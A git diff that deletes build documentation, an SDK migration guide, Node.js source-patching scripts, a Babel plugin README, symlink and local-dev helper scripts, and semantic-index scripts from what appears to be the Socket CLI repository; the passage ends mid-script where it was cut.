-| Full build | ~27ms | CI, production, clean builds | -| Incremental | ~9ms | Development, hot reload | -| **Improvement** | **68% faster** | Watch mode only | - -## How It Works - -The build system uses esbuild's incremental mode when `--watch` is enabled: - -1. **First build**: Full compilation (~27ms) -2. **Subsequent builds**: Only changed files (~9ms) -3. **Smart caching**: Build metadata reused across rebuilds -4. **Type checking**: Runs in parallel with bundling - -## Watch Mode Features - -```bash -pnpm build --watch -``` - -**Capabilities:** -- Automatic rebuild on file changes -- Preserved build context for faster increments -- Terminal output shows rebuild times -- Errors displayed immediately - -**Limitations:** -- Type declarations regenerated each time -- Cache not persisted across process restarts -- Memory footprint slightly higher (build context in memory) - -## Development Workflow - -**Recommended setup:** - -```bash -# Terminal 1: Watch mode for builds -pnpm build --watch - -# Terminal 2: Run tests -pnpm test --fast - -# Terminal 3: Type checking (optional) -pnpm tsc --watch -``` - -## Configuration - -Build configuration lives in: -- `scripts/build.mjs` - Main build orchestration -- `.config/esbuild.config.mjs` - esbuild settings -- `.config/tsconfig.dts.json` - Type declaration generation - -## Optimization Tips - -1. **Use watch mode for development** - - 68% faster rebuilds - - Immediate feedback loop - - Lower cognitive load - -2. **Skip checks for quick iterations** - ```bash - pnpm test --fast # Skip lint/type checks - ``` - -3. **Parallel workflows** - - Build in one terminal - - Tests in another - - No waiting for sequential operations - -4. **Clean builds when needed** - ```bash - pnpm clean # Remove dist/ - pnpm build # Fresh build - ``` - -## Troubleshooting - -**Issue: Build seems slow** -- Solution: Ensure you're using `--watch` flag -- Check: `NODE_ENV` not set to `production` - -**Issue: Changes not reflected** -- Solution: Kill watch process and restart -- Check: Ensure file is not in `.gitignore` - -**Issue: Type errors not shown** -- Solution: Run `pnpm tsc` separately -- Context: Watch mode prioritizes speed over type checking - -## Implementation Details - -**esbuild configuration:** -```javascript -{ - incremental: isWatch, // Enable incremental mode - bundle: true, - format: 'esm', - platform: 'node', - target: 'node18', - // ... other settings -} -``` - -**Watch mode detection:** -```javascript -const isWatch = process.argv.includes('--watch') -``` - -## Performance Metrics - -**Measured on M1 Mac:** -- Full TypeScript build: ~27ms -- Incremental rebuild: ~9ms -- Type declaration generation: ~15ms (parallel) - -**Total development cycle:** -- Edit → Save → Rebuild: < 50ms -- Edit → Save → Rebuild → Test: < 2s (with `--fast`) - -## See Also - -- `docs/getting-started.md` - Initial setup -- `docs/dev/scripts.md` - All available scripts -- `scripts/build.mjs` - Build script implementation diff --git a/packages/sdk/docs/migration-v3.md b/packages/sdk/docs/migration-v3.md deleted file mode 100644 index 1d797090b..000000000 --- a/packages/sdk/docs/migration-v3.md +++ /dev/null @@ -1,79 +0,0 @@ -# Migration Guide: v2.x to v3.0 - -## Removed Methods - -These methods have been removed. Use the modern full scan equivalents: - -- `createScan()` → `createFullScan()` -- `deleteScan()` → `deleteFullScan()` -- `getScan()` → `getFullScan()` -- `listScans()` → `listFullScans()` - -## Method Renames - -### Full Scans - -| v2.x | v3.0 | -|------|------| -| `getOrgFullScanList()` | `listFullScans()` | -| `createOrgFullScan()` | `createFullScan()` | -| `getOrgFullScanBuffered()` | `getFullScan()` | -| `deleteOrgFullScan()` | `deleteFullScan()` | -| `streamOrgFullScan()` | `streamFullScan()` | -| `getOrgFullScanMetadata()` | `getFullScanMetadata()` | - -### Organizations - -| v2.x | v3.0 | -|------|------| -| `getOrganizations()` | `listOrganizations()` | - -### Repositories - -| v2.x | v3.0 | -|------|------| -| `getOrgRepoList()` | `listRepositories()` | -| `getOrgRepo()` | `getRepository()` | -| `createOrgRepo()` | `createRepository()` | -| `updateOrgRepo()` | `updateRepository()` | -| `deleteOrgRepo()` | `deleteRepository()` | - -## Search and Replace - -```bash -# Full scans -getOrgFullScanList → listFullScans -createOrgFullScan → createFullScan -getOrgFullScanBuffered → getFullScan -deleteOrgFullScan → deleteFullScan -streamOrgFullScan → streamFullScan -getOrgFullScanMetadata → getFullScanMetadata - -# Organizations -getOrganizations → listOrganizations - -# Repositories -getOrgRepoList → listRepositories -getOrgRepo → getRepository -createOrgRepo → createRepository -updateOrgRepo → updateRepository -deleteOrgRepo → deleteRepository - -# Removed - use full scan methods -createScan → createFullScan -deleteScan → deleteFullScan -getScan → getFullScan -listScans → listFullScans -``` - -## Type Changes - -v3.0 marks guaranteed API fields as required instead of optional. Fields like `id` and `created_at` are now typed as `string` instead of `string | undefined`, improving IntelliSense. - -New strict types available: -- `FullScanListResult` -- `FullScanResult` -- `OrganizationsResult` -- `RepositoriesListResult` -- `DeleteResult` -- `StrictErrorResult` diff --git a/packages/sdk/docs/security.md b/packages/sdk/docs/security.md deleted file mode 100644 index 27231c989..000000000 --- a/packages/sdk/docs/security.md +++ /dev/null @@ -1,7 +0,0 @@ -# Reporting Security Issues - -**Report security vulnerabilities directly to [security@socket.dev](mailto:security@socket.dev).** - -All reports are taken seriously and addressed promptly. - -**Do not report security vulnerabilities through public GitHub issues, discussions, or pull requests.** diff --git a/scripts/apply-socket-mods.mjs b/scripts/apply-socket-mods.mjs deleted file mode 100644 index 5864293b2..000000000 --- a/scripts/apply-socket-mods.mjs +++ /dev/null @@ -1,160 +0,0 @@ -/** - * @fileoverview Apply Socket-specific modifications to Node.js source - * - * This script modifies Node.js source files with Socket-specific changes. - * After running this, you can generate patches with `git diff`. - * - * Usage: - * node scripts/apply-socket-mods.mjs - */ - -import { readFile, writeFile } from 'node:fs/promises' -import { dirname, join } from 'node:path' -import { fileURLToPath } from 'node:url' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __filename = fileURLToPath(import.meta.url) -const __dirname = dirname(__filename) - -const ROOT_DIR = join(__dirname, '..') -const BUILD_DIR = join(ROOT_DIR, 'build') -const NODE_DIR = join(BUILD_DIR, 'node-smol') - -/** - * Fix V8 include paths - */ -async function fixV8IncludePaths() { - logger.log('🔧 Fixing V8 include paths...') - - const fixes = [ - { - file: 'deps/v8/src/ast/ast-value-factory.h', - replacements: [ - { - from: '#include "src/base/hashmap.h"', - to: '#include "base/hashmap.h"', - }, - ], - }, - { - file: 'deps/v8/src/heap/new-spaces-inl.h', - replacements: [ - { - from: '#include "src/heap/spaces-inl.h"', - to: '#include "heap/spaces-inl.h"', - }, - ], - }, - { - file: 'deps/v8/src/heap/factory-inl.h', - replacements: [ - { - from: '#include "src/heap/factory-base-inl.h"', - to: '#include "heap/factory-base-inl.h"', - }, - ], - }, - { - file: 'deps/v8/src/objects/js-objects-inl.h', - replacements: [ - { - from: '#include "src/objects/hash-table-inl.h"', - to: '#include "objects/hash-table-inl.h"', - }, - ], - }, - { - file: 'deps/v8/src/heap/cppgc/heap-page.h', - replacements: [ - { - from: '#include "src/base/iterator.h"', - to: '#include "base/iterator.h"', - }, - ], - }, - ] - - for (const { file, replacements } of fixes) { - const filePath = join(NODE_DIR, file) - try { - let content = await readFile(filePath, 'utf8') - let modified = false - - for (const { from, to } of replacements) { - if (content.includes(from)) { - content = content.replace(from, to) - modified = true - logger.log(` ✓ Fixed: ${file}`) - } - } - - if (modified) { - await writeFile(filePath, content, 'utf8') - } - } catch (e) { - logger.warn(` ${colors.yellow('⚠')} Could not fix ${file}: ${e.message}`) - } - } - - logger.log(`${colors.green('✓')} V8 include paths fixed`) - logger.log('') -} - -/** - * Enable SEA detection for pkg binaries - */ -async function enableSeaForPkg() { - logger.log('🔧 Enabling SEA detection for pkg binaries...') - - const filePath = join(NODE_DIR, 'lib', 'sea.js') - - try { - let content = await readFile(filePath, 'utf8') - - // Replace the isSea import - const oldImport = - "const { isSea, getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea');" - const newImport = `const isSea = () => true; -const { getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea');` - - if (content.includes(oldImport)) { - content = content.replace(oldImport, newImport) - await writeFile(filePath, content, 'utf8') - logger.log(' ✓ Modified: lib/sea.js') - } else { - logger.log(' ℹ️ lib/sea.js already modified or structure changed') - } - } catch (e) { - logger.warn(` ${colors.yellow('⚠')} Could not modify lib/sea.js: ${e.message}`) - } - - logger.log(`${colors.green('✓')} SEA detection enabled`) - logger.log('') -} - -/** - * Main function - */ -async function main() { - logger.log('🔨 Applying Socket modifications to Node.js source') - logger.log('') - - await fixV8IncludePaths() - await enableSeaForPkg() - - logger.log('🎉 All modifications applied!') - logger.log('') - logger.log('📝 To generate patches:') - logger.log(' cd build/node-smol') - logger.log(' git diff > ../../build/patches/socket/my-changes.patch') - logger.log('') -} - -// Run main function -main().catch(error => { - logger.error(`${colors.red('✗')} Failed to apply modifications:`, error.message) - process.exitCode = 1 -}) diff --git a/scripts/babel/README.md b/scripts/babel/README.md deleted file mode 100644 index c80e8a21b..000000000 --- a/scripts/babel/README.md +++ /dev/null @@ -1,301 +0,0 @@ -# Babel Plugins for Socket CLI - -This directory contains custom Babel plugins used to transform Socket CLI code during the build process. - -## Plugins - -### Core Transformation Plugins - -#### `babel-plugin-inline-require-calls.js` -Inlines `require()` calls for better bundling performance. - -#### `transform-set-proto-plugin.mjs` -Transforms `__proto__` assignments into `Object.setPrototypeOf()` calls for strict mode compatibility. - -**Before:** -```javascript -Foo.prototype.__proto__ = Bar.prototype -``` - -**After:** -```javascript -Object.setPrototypeOf(Foo.prototype, Bar.prototype) -``` - -#### `transform-url-parse-plugin.mjs` -Optimizes URL parsing operations. - ---- - -### Strict Mode Plugin - -#### `babel-plugin-strict-mode.mjs` -Transforms loose-mode JavaScript into strict-mode compatible code. - -**Transformations:** -1. **Octal literals** → Decimal numbers -2. **Octal escape sequences** → Proper escape sequences -3. **With statements** → Error (cannot be safely transformed) -4. **Adds 'use strict'** directive if missing - -**Example Transformations:** - -```javascript -// Before: -var x = 0123 // Octal literal -var str = 'Hello\012World' // Octal escape - -// After: -'use strict' -var x = 83 // Decimal (0123 in octal = 83) -var str = 'Hello\nWorld' // Proper escape (\012 = \n) -``` - -**Octal Escape Mappings:** -- `\0` → `\0` (null) -- `\10` → `\b` (backspace) -- `\11` → `\t` (tab) -- `\12` → `\n` (line feed) -- `\13` → `\v` (vertical tab) -- `\14` → `\f` (form feed) -- `\15` → `\r` (carriage return) -- `\16`-`\377` → `\xNN` (hex escape) - -**Usage:** -This plugin is **always enabled** in the build pipeline (see `.config/babel.config.js`). - ---- - -### --with-intl=none Plugin - -#### `babel-plugin-with-intl-none.mjs` -Transforms ICU-dependent code into ICU-free alternatives, enabling Node.js builds with `--with-intl=none`. - -**Note**: `--without-intl` is deprecated, use `--with-intl=none` instead. - -**✅ Status:** This plugin is **ENABLED** in Socket CLI builds. - -**Why enabled:** -1. Socket CLI uses `--with-intl=none` for 6-8MB size reduction -2. Combined with runtime Intl stub polyfill for complete compatibility -3. Transforms Socket CLI source code at build time - -**Transformations:** - -##### 1. Number Formatting -```javascript -// Before: -count.toLocaleString() -(1234567).toLocaleString() - -// After: -__formatNumber(count) // → "1,234,567" -__formatNumber(1234567) -``` - -##### 2. Date Formatting -```javascript -// Before: -new Date().toLocaleDateString() -new Date().toLocaleTimeString() - -// After: -__formatDate(new Date()) // → "2025-10-07" -// ISO time format -``` - -##### 3. String Comparison -```javascript -// Before: -str1.localeCompare(str2) - -// After: -__simpleCompare(str1, str2) // Basic < > comparison -``` - -##### 4. Intl.* APIs -```javascript -// Before: -new Intl.NumberFormat().format(num) -new Intl.DateTimeFormat().format(date) - -// After: -{ format: (num) => __formatNumber(num) } -{ format: (date) => date.toISOString() } -``` - -##### 5. Unicode Regular Expressions -```javascript -// Before: -/\p{Letter}/u -/\p{Number}/u -/[\p{Letter}\p{Number}]+/v // ES2024 /v flag - -// After: -/[a-zA-Z]/ -/[0-9]/ -/[a-zA-Z0-9]+/ // /v flag removed, \p{...} transformed -``` - -**Note**: The `/v` flag (unicodeSets, ES2024) is automatically downgraded to `/u` or removed entirely when transforming `\p{...}` patterns. - -**Helper Functions Generated:** -```javascript -function __formatNumber(num) { - return num.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ',') -} - -function __formatDate(date) { - return date.toISOString().split('T')[0] -} - -function __formatDateTime(date) { - return date.toISOString().replace('T', ' ').replace(/\.\d+Z$/, ' UTC') -} - -function __simpleCompare(a, b) { - return a < b ? -1 : a > b ? 1 : 0 -} -``` - -**Limitations:** -- ❌ No real locale support (only English-style formatting) -- ❌ No timezone support beyond UTC -- ❌ No currency formatting -- ❌ No plural rules -- ❌ No locale-aware sorting (simple byte comparison only) - -**When to Use:** -- Building pkg binaries where every MB matters -- English-only CLI tool -- Willing to trade locale support for ~8-10MB size reduction - -**Already enabled** in `.config/babel.config.js` (line 36). - -**Build Requirements:** - -1. Node.js must be built with `--with-intl=none`: -```bash -# Use our automated build script: -node scripts/build-yao-pkg-node.mjs --clean - -# This builds Node.js with: -# --disable-single-executable-application (Remove SEA, -1-2 MB) -# --enable-lto (Link-time optimization) -# --v8-disable-object-print (Disable V8 object printing) -# --v8-lite-mode (Smaller V8, -15-20 MB) -# --with-icu-source=none (Don't download ICU source) -# --with-intl=none (ICU removed, -6-8 MB) -# --without-amaro (Remove amaro) -# --without-corepack (Remove corepack) -# --without-inspector (Remove inspector) -# --without-node-code-cache (Remove code cache) -# --without-node-options (Remove node options) -# --without-node-snapshot (Remove snapshot) -# --without-npm (Remove npm) -# --without-sqlite (Remove sqlite) -``` - -2. Rebuild Socket CLI: -```bash -pnpm run build:cli -``` - -**Testing:** -After enabling, verify all CLI output still works: -```bash -# Test number formatting -pnpm exec socket scan --help - -# Test date display -pnpm exec socket info some-package - -# Test full CLI functionality -pnpm run test:unit -``` - ---- - -## Plugin Execution Order - -Plugins run in this order (defined in `.config/babel.config.js`): - -1. `@babel/preset-typescript` (preset) -2. `@babel/preset-react` (preset) -3. `@babel/plugin-proposal-export-default-from` -4. `@babel/plugin-transform-export-namespace-from` -5. `@babel/plugin-transform-runtime` -6. **`babel-plugin-strict-mode.mjs`** ⭐ (fixes loose-mode code) -7. `babel-plugin-inline-require-calls.js` -8. `transform-set-proto-plugin.mjs` -9. `transform-url-parse-plugin.mjs` -10. **`babel-plugin-with-intl-none.mjs`** ⭐ (--with-intl=none compatibility, ENABLED) - ---- - -## Development - -### Adding a New Plugin - -1. Create a new file in `scripts/babel/` with the `.mjs` extension -2. Add `@fileoverview` header with description -3. Export a default function that returns a Babel plugin: - -```javascript -/** @fileoverview Brief description of what the plugin does */ - -export default function myPlugin({ types: t }) { - return { - name: 'my-plugin-name', - visitor: { - // AST visitor methods - Identifier(path) { - // Transform code - } - } - } -} -``` - -4. Add the plugin to `.config/babel.config.js`: -```javascript -plugins: [ - // ... - path.join(babelPluginsPath, 'my-new-plugin.mjs'), -] -``` - -### Testing Plugins - -Build and test the transformed output: -```bash -# Build with transformations -pnpm run build:cli - -# Check transformed code -cat dist/cli.js | head -100 - -# Run tests -pnpm run test:unit -``` - ---- - -## Size Impact - -| Plugin | Binary Size Impact | Purpose | -|--------|-------------------|---------| -| `babel-plugin-strict-mode.mjs` | ~0 bytes | Code compatibility | -| `babel-plugin-with-intl-none.mjs` | **-6-8MB** | --with-intl=none compatibility | - -**Note:** The size reduction comes from building Node.js with `--with-intl=none`, not the plugin itself. The plugin transforms code to work without ICU. - ---- - -## References - -- [Babel Plugin Handbook](https://github.com/jamiebuilds/babel-handbook/blob/master/translations/en/plugin-handbook.md) -- [Babel Types API](https://babeljs.io/docs/en/babel-types) -- [AST Explorer](https://astexplorer.net/) - Visualize AST transformations -- [Node.js ICU Documentation](https://nodejs.org/api/intl.html) -- [Socket CLI Build Documentation](../../docs/YAO_PKG_BUILD.md) diff --git a/scripts/create-sea-symlinks.mjs b/scripts/create-sea-symlinks.mjs deleted file mode 100644 index 9458e870a..000000000 --- a/scripts/create-sea-symlinks.mjs +++ /dev/null @@ -1,106 +0,0 @@ -/** - * Create symlinks for the unified Socket CLI SEA binary. - * - * This script creates symlinks so that the single SEA binary can be - * invoked as different commands: - * - socket -> socket (main binary) - * - socket-npm -> socket - * - socket-npx -> socket - * - socket-pnpm -> socket - * - socket-yarn -> socket - * - * The bootstrap detects how it was invoked and routes to the appropriate - * Socket CLI command. - * - * Usage: - * node scripts/create-sea-symlinks.mjs ./socket ./output-dir - */ - -import { promises as fs } from 'node:fs' -import path from 'node:path' -import process from 'node:process' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const COMMANDS = ['socket-npm', 'socket-npx', 'socket-pnpm', 'socket-yarn'] - -async function createSymlinks(binaryPath, outputDir) { - const binaryName = path.basename(binaryPath) - const isWindows = process.platform === 'win32' - - // Ensure output directory exists - await fs.mkdir(outputDir, { recursive: true }) - - logger.log(`Creating symlinks for ${binaryName}...`) - - for (const command of COMMANDS) { - const symlinkName = isWindows ? `${command}.exe` : command - const symlinkPath = path.join(outputDir, symlinkName) - - try { - // Remove existing symlink if it exists - await fs.unlink(symlinkPath).catch(() => {}) - - if (isWindows) { - // On Windows, copy the executable instead of symlinking - // (symlinks require admin privileges) - logger.log(` Copying ${binaryName} -> ${symlinkName}`) - await fs.copyFile(binaryPath, symlinkPath) - } else { - // On Unix, create a symlink - logger.log(` Linking ${symlinkName} -> ${binaryName}`) - await fs.symlink(binaryName, symlinkPath) - } - } catch (error) { - logger.error(` Failed to create ${symlinkName}: ${error.message}`) - } - } - - logger.log('Symlinks created successfully!') - - if (!isWindows) { - logger.log('\nTo test the symlinks:') - for (const command of COMMANDS) { - logger.log(` ./${path.join(outputDir, command)} --help`) - } - } -} - -// CLI usage -async function main() { - const [, , binaryPath, outputDir] = process.argv - - if (!binaryPath) { - logger.error( - 'Usage: node create-sea-symlinks.mjs [output-dir]', - ) - logger.error('Example: node create-sea-symlinks.mjs ./socket ./dist') - process.exit(1) - } - - const resolvedBinaryPath = path.resolve(binaryPath) - const resolvedOutputDir = outputDir - ? path.resolve(outputDir) - : path.dirname(resolvedBinaryPath) - - // Check if binary exists - try { - await fs.access(resolvedBinaryPath) - } catch { - logger.error(`Error: Binary not found at ${resolvedBinaryPath}`) - process.exit(1) - } - - await createSymlinks(resolvedBinaryPath, resolvedOutputDir) -} - -if (import.meta.url === `file://${process.argv[1]}`) { - main().catch(error => { - logger.error('Error:', error) - process.exit(1) - }) -} - -export { createSymlinks } diff --git a/scripts/dev-local.sh b/scripts/dev-local.sh deleted file mode 100755 index 4d62ef97e..000000000 --- a/scripts/dev-local.sh +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env bash -# Helper script to run socket CLI against local depscan API server -# -# Usage: -# ./scripts/dev-local.sh [socket command] -# -# Examples: -# ./scripts/dev-local.sh --version -# ./scripts/dev-local.sh patch discover -# ./scripts/dev-local.sh scan create . - -# Load .env.local if it exists -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | grep -v '^$' | xargs) -fi - -# Set default local API server URL if not already set -export SOCKET_CLI_API_BASE_URL="${SOCKET_CLI_API_BASE_URL:-http://localhost:8866}" - -echo "🔧 Using API server: $SOCKET_CLI_API_BASE_URL" -echo "" - -# Run the CLI with all arguments passed through -./bin/cli.js "$@" diff --git a/scripts/generate-node-patches.mjs b/scripts/generate-node-patches.mjs deleted file mode 100644 index d7e15ad4d..000000000 --- a/scripts/generate-node-patches.mjs +++ /dev/null @@ -1,213 +0,0 @@ -/** - * @fileoverview Generate Socket-specific patches for Node.js - * - * This script generates patches for Socket CLI's custom Node.js modifications. - * Run this after applying patches but before building to capture - * Socket-specific changes. - * - * Usage: - * node scripts/generate-node-patches.mjs [--version v24.10.0] - */ - -import { existsSync } from 'node:fs' -import { mkdir, writeFile } from 'node:fs/promises' -import { dirname, join } from 'node:path' -import { fileURLToPath } from 'node:url' - -import { spawn } from '@socketsecurity/lib/spawn' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __filename = fileURLToPath(import.meta.url) -const __dirname = dirname(__filename) - -// Parse arguments -const args = process.argv.slice(2) -const versionArg = args.find(arg => arg.startsWith('--version=')) -const NODE_VERSION = versionArg ? versionArg.split('=')[1] : 'v24.10.0' - -const ROOT_DIR = join(__dirname, '..') -const BUILD_DIR = join(ROOT_DIR, 'build') -const NODE_DIR = join(BUILD_DIR, 'node-smol') -const PATCHES_OUTPUT_DIR = join(ROOT_DIR, 'build', 'patches', 'socket') - -/** - * Execute a command and capture output - */ -async function exec(command, args = [], options = {}) { - const { cwd = process.cwd() } = options - - logger.log(`$ ${command} ${args.join(' ')}`) - - const result = await spawn(command, args, { - cwd, - stdio: 'pipe', - shell: false, - }) - - if (result.code !== 0) { - throw new Error( - `Command failed with exit code ${result.code}: ${result.stderr}`, - ) - } - - return result.stdout -} - -/** - * Generate fix-v8-include-paths patch - */ -async function generateV8IncludePathsPatch() { - logger.log('📝 Generating fix-v8-include-paths patch...') - - const files = [ - 'deps/v8/src/ast/ast-value-factory.h', - 'deps/v8/src/heap/new-spaces-inl.h', - 'deps/v8/src/heap/factory-inl.h', - 'deps/v8/src/objects/js-objects-inl.h', - 'deps/v8/src/heap/cppgc/heap-page.h', - ] - - let patchContent = `# Fix V8 include paths for Node.js ${NODE_VERSION} -# -# Node.js ${NODE_VERSION} source has incorrect include paths in V8 code -# Files are looking for 'src/base/hashmap.h' when it should be 'base/hashmap.h' -# This patch removes the incorrect 'src/' prefix from V8 internal includes -# -# This issue causes build failures with errors like: -# fatal error: 'src/base/hashmap.h' file not found -# -# Author: Socket CLI -# Date: ${new Date().toISOString().split('T')[0]} -# Node versions affected: ${NODE_VERSION} -` - - for (const file of files) { - const filePath = join(NODE_DIR, file) - if (!existsSync(filePath)) { - logger.warn(`${colors.yellow('⚠')} File not found: ${file}`) - continue - } - - // Create a git diff for this file - try { - const diff = await exec( - 'git', - ['diff', '--no-index', '/dev/null', file], - { - cwd: NODE_DIR, - }, - ) - patchContent += `\n${diff}` - } catch (_e) { - // git diff returns non-zero for differences, which is expected. - logger.warn(` Skipping ${file} (no changes or error)`) - } - } - - const patchFile = join( - PATCHES_OUTPUT_DIR, - `fix-v8-include-paths-${NODE_VERSION.replace('v', 'v')}.patch`, - ) - await writeFile(patchFile, patchContent) - logger.log(`${colors.green('✓')} Generated: ${patchFile}`) - - return patchFile -} - -/** - * Generate enable-sea-for-pkg-binaries patch - */ -async function generateSeaPatch() { - logger.log('📝 Generating enable-sea-for-pkg-binaries patch...') - - const patchContent = `# Patch: Make isSea() return true for pkg binaries -# -# Overrides the isSea binding to always return true, making pkg binaries -# report as Single Executable Applications for consistency. -# -# Author: Socket CLI -# Date: ${new Date().toISOString().split('T')[0]} -# Node version: ${NODE_VERSION} - ---- a/lib/sea.js -+++ b/lib/sea.js -@@ -16,7 +16,8 @@ const { - ERR_UNKNOWN_BUILTIN_MODULE, - } = require('internal/errors').codes; - --const { isSea, getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea'); -+const isSea = () => true; -+const { getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea'); - - const { - setOwnProperty, -` - - const patchFile = join( - PATCHES_OUTPUT_DIR, - `enable-sea-for-pkg-binaries-${NODE_VERSION.replace('v', 'v')}.patch`, - ) - await writeFile(patchFile, patchContent) - logger.log(`${colors.green('✓')} Generated: ${patchFile}`) - - return patchFile -} - -/** - * Main function - */ -async function main() { - logger.log(`🔨 Generating Socket patches for Node.js ${NODE_VERSION}`) - logger.log('') - - // Check if Node.js directory exists - if (!existsSync(NODE_DIR)) { - throw new Error( - `Node.js source directory not found: ${NODE_DIR}\n` + - 'Run build-yao-pkg-node.mjs first to download and patch Node.js source.', - ) - } - - // Ensure output directory exists - await mkdir(PATCHES_OUTPUT_DIR, { recursive: true }) - - // Generate patches - const patches = [] - - try { - patches.push(await generateV8IncludePathsPatch()) - } catch (e) { - logger.error(`${colors.red('✗')} Failed to generate V8 include paths patch:`, e.message) - } - - try { - patches.push(await generateSeaPatch()) - } catch (e) { - logger.error(`${colors.red('✗')} Failed to generate SEA patch:`, e.message) - } - - logger.log('') - logger.log('🎉 Patch generation complete!') - logger.log('') - logger.log('Generated patches:') - for (const patch of patches) { - logger.log(` - ${patch}`) - } - logger.log('') - logger.log('📝 Next steps:') - logger.log(' 1. Review the generated patches') - logger.log( - ' 2. Update build-yao-pkg-node.mjs to reference new patch files', - ) - logger.log(' 3. Test the build with new patches') - logger.log('') -} - -// Run main function -main().catch(error => { - logger.error(`${colors.red('✗')} Patch generation failed:`, error.message) - process.exitCode = 1 -}) diff --git a/scripts/llm/README.md b/scripts/llm/README.md deleted file mode 100644 index 52e51af95..000000000 --- a/scripts/llm/README.md +++ /dev/null @@ -1,90 +0,0 @@ -# LLM & Semantic Understanding Scripts - -Scripts for building semantic understanding capabilities for Socket CLI without heavy ML models. - -## Philosophy - -**Goal**: Enable natural language understanding for `socket ask` command **WITHOUT** shipping 12MB+ ML models. - -**Approach**: Pre-compute semantic indices at build time using lightweight techniques: -- Synonym expansion -- Word overlap matching -- Manual curation of common query patterns - -**Result**: ~3KB semantic index vs 12MB ML model, with 80-90% of the semantic matching capability. - -## Scripts - -### `generate-semantic-index.mjs` - -**Purpose**: Generate semantic similarity index without ML models. - -**What it does**: -- Reads Socket CLI command definitions -- Expands keywords using synonym dictionary -- Creates searchable word index for fast matching - -**Output**: `~/.claude/skills/socket-cli/semantic-index.json` (~3KB) - -**Usage**: -```bash -node scripts/llm/generate-semantic-index.mjs -``` - -**How it works**: -1. Maps synonyms to canonical forms (e.g., "repair" → "fix") -2. Extracts meaningful words from commands, descriptions, examples -3. Creates word overlap index for O(n) matching at runtime - -**Examples**: -- Query: "repair vulnerabilities" → Matches "fix" (via synonym) -- Query: "check my deps" → Matches "scan" (deps = dependencies) - -### `generate-skill-embeddings.mjs` (deprecated) - -**Status**: NOT USED - requires transformers.js (12MB+) - -This was the original approach using ML embeddings. We've replaced it with the -lightweight semantic-index approach above. - -### `compute-embeddings-pure.mjs` (deprecated) - -**Status**: NOT USED - requires onnxruntime-node - -Attempted to use pure ONNX without transformers.js wrapper, but still requires -native dependencies and model downloads. - -## Integration - -The semantic index is loaded by `src/commands/ask/handle-ask.mts` at runtime: - -```javascript -// Load semantic index (3KB, pre-computed). -const semanticIndex = JSON.parse( - readFileSync('~/.claude/skills/socket-cli/semantic-index.json') -) - -// Match query using word overlap. -const match = findBestMatch(query, semanticIndex) -``` - -## Claude Skills - -These scripts also generate data for Claude Code skills stored in `~/.claude/skills/socket-cli/`: - -- `SKILL.md` - Skill definition and documentation -- `commands.json` - Structured command data -- `semantic-index.json` - Pre-computed semantic index - -These skills help Claude better understand Socket CLI when providing assistance. - -## Future Enhancements - -Possible improvements (all without ML models): - -1. **Fuzzy matching** - Handle typos using Levenshtein distance -2. **N-gram matching** - Match partial phrases -3. **Context awareness** - Consider previous commands in session -4. **User feedback loop** - Learn from corrections - -All of these can be implemented in pure JavaScript with <10KB overhead. diff --git a/scripts/llm/compute-embeddings-pure.mjs b/scripts/llm/compute-embeddings-pure.mjs deleted file mode 100644 index b14240227..000000000 --- a/scripts/llm/compute-embeddings-pure.mjs +++ /dev/null @@ -1,265 +0,0 @@ -/** - * Pre-compute semantic embeddings WITHOUT transformers.js wrapper. - * Uses ONNX Runtime directly - no sharp, no image processing dependencies. - */ - -import { promises as fs, mkdirSync, readFileSync, writeFileSync } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -import * as ort from 'onnxruntime-node' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const skillDir = path.join( - path.dirname(__dirname), - '../.claude/skills/socket-cli', -) -const cacheDir = path.join(path.dirname(__dirname), '.cache/models') - -logger.log( - '🧠 Computing semantic embeddings (pure ONNX, no transformers.js)...', -) - -// Ensure cache directory exists. -mkdirSync(cacheDir, { recursive: true }) - -// Download model if not cached. -const modelPath = path.join(cacheDir, 'paraphrase-MiniLM-L3-v2.onnx') - -async function downloadModel() { - try { - await fs.access(modelPath) - logger.log('✓ Model already cached') - return - } catch { - logger.log('📦 Downloading paraphrase-MiniLM-L3-v2 model...') - - // Hugging Face model URL (quantized ONNX). - const modelUrl = - 'https://huggingface.co/Xenova/paraphrase-MiniLM-L3-v2/resolve/main/onnx/model_quantized.onnx' - - const response = await fetch(modelUrl) - if (!response.ok) { - throw new Error(`Failed to download model: ${response.statusText}`) - } - - const buffer = await response.arrayBuffer() - await fs.writeFile(modelPath, Buffer.from(buffer)) - - logger.log(`✓ Downloaded ${buffer.byteLength} bytes`) - } -} - -// Download tokenizer config. -const tokenizerPath = path.join(cacheDir, 'tokenizer.json') - -async function downloadTokenizer() { - try { - await fs.access(tokenizerPath) - logger.log('✓ Tokenizer already cached') - return - } catch { - logger.log('📦 Downloading tokenizer...') - - const tokenizerUrl = - 'https://huggingface.co/Xenova/paraphrase-MiniLM-L3-v2/resolve/main/tokenizer.json' - - const response = await fetch(tokenizerUrl) - if (!response.ok) { - throw new Error(`Failed to download tokenizer: ${response.statusText}`) - } - - const json = await response.json() - await fs.writeFile(tokenizerPath, JSON.stringify(json, null, 2)) - - logger.log('✓ Downloaded tokenizer') - } -} - -/** - * Simple tokenizer for BERT-like models. - */ -class SimpleTokenizer { - constructor(vocab) { - this.vocab = vocab - this.idsToTokens = Object.fromEntries( - Object.entries(vocab).map(([k, v]) => [v, k]), - ) - } - - encode(text) { - // Simple whitespace + lowercase tokenization. - // Real implementation would use WordPiece. - const tokens = ['[CLS]'] - - for (const word of text.toLowerCase().split(/\s+/)) { - if (this.vocab[word] !== undefined) { - tokens.push(word) - } else { - // Split into subwords (simplified). - 